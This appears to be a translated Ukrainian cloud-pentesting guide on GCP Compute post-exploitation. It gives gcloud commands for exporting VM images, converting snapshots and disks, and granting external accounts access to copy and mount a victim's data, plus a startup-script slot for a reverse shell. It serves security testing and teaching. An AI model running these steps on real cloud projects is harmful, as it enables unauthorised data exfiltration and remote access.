GCP - Compute Post Exploitation

Compute

Для отримання додаткової інформації про Compute та VPC (мережі) перегляньте:

Експорт та перевірка зображень локально

Це дозволить зловмиснику отримати доступ до даних, що містяться в уже існуючих зображеннях або створити нові зображення працюючих ВМ та отримати доступ до їхніх даних без доступу до працюючої ВМ.

Можливо експортувати зображення ВМ у бакет, а потім завантажити його та змонтувати локально за допомогою команди:

gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# The download the export from the bucket and mount it locally

Для виконання цієї дії зловмиснику можуть знадобитися привілеї над сховищем, а також, безумовно, привілеї над cloudbuild, оскільки це сервіс, який буде запитаний для виконання експорту Більше того, для цього кодування SA та SA обчислень потрібні привілейовані дозволи. SA cloudbuild <project-id>@cloudbuild.gserviceaccount.com потрібні:

• roles/iam.serviceAccountTokenCreator

• roles/compute.admin

• roles/iam.serviceAccountUser

А SA <project-id>-compute@developer.gserviceaccount.com потрібні:

• roles/compute.storageAdmin

• roles/storage.objectAdmin

Експорт та перевірка знімків та дисків локально

Неможливо безпосередньо експортувати знімки та диски, але можливо перетворити знімок у диск, диск в образ і, слідуючи попередньому розділу, експортувати цей образ для перевірки його локально

# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]

# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]

Інспекція зображення, створюючи VM

З метою доступу до даних, збережених у зображенні або всередині працюючої VM, з якої зловмисник створив зображення, можливо надати зовнішньому обліковому запису доступ до зображення:

gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'

і потім створити нову VM з цього:

gcloud compute instances create [INSTANCE_NAME] \
--project=[TARGET_PROJECT_ID] \
--zone=[ZONE] \
--image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]

Якщо ви не могли надати доступ до вашого зовнішнього облікового запису через образ, ви могли б запустити ВМ, використовуючи цей образ у проекті жертви, і змусити метадані виконати зворотне з'єднання для доступу до образу, додавши параметр:

--metadata startup-script='#! /bin/bash
echo "hello"; <reverse shell>'

Inspect a Snapshot/Disk attaching it to a VM

З метою доступу до даних, збережених на диску або знімку, ви можете перетворити знімок на диск, диск на образ і слідувати попереднім крокам.

Або ви можете надати зовнішньому обліковому запису доступ до диска (якщо початковою точкою є знімок, надайте доступ до знімка або створіть диск з нього):

gcloud projects add-iam-policy-binding [PROJECT_ID] \
--member='user:[USER_EMAIL]' \
--role='roles/compute.storageAdmin'

Прикріпіть диск до екземпляра:

gcloud compute instances attach-disk [INSTANCE_NAME] \
--disk [DISK_NAME] \
--zone [ZONE]

Монтуйте диск всередині VM:

1. SSH до VM:

gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]

1. Визначте диск: Після входу в VM визначте новий диск, перерахувавши пристрої дисків. Зазвичай ви можете знайти його як /dev/sdb, /dev/sdc тощо.

2. Форматування та монтування диска (якщо це новий або сирий диск):

• Створіть точку монтування:

sudo mkdir -p /mnt/disks/[MOUNT_DIR]

• Замонтуйте диск:

sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]

Якщо ви не можете надати доступ до зовнішнього проекту до знімка або диска, вам, можливо, потрібно буде виконати ці дії всередині екземпляра в тому ж проекті, що й знімок/диск.